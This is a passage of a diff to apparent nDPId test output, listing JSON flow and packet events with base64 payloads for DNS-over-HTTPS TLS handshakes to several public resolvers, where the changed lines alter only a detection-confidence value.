+00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+dUBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rczn9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrDVkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQfRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 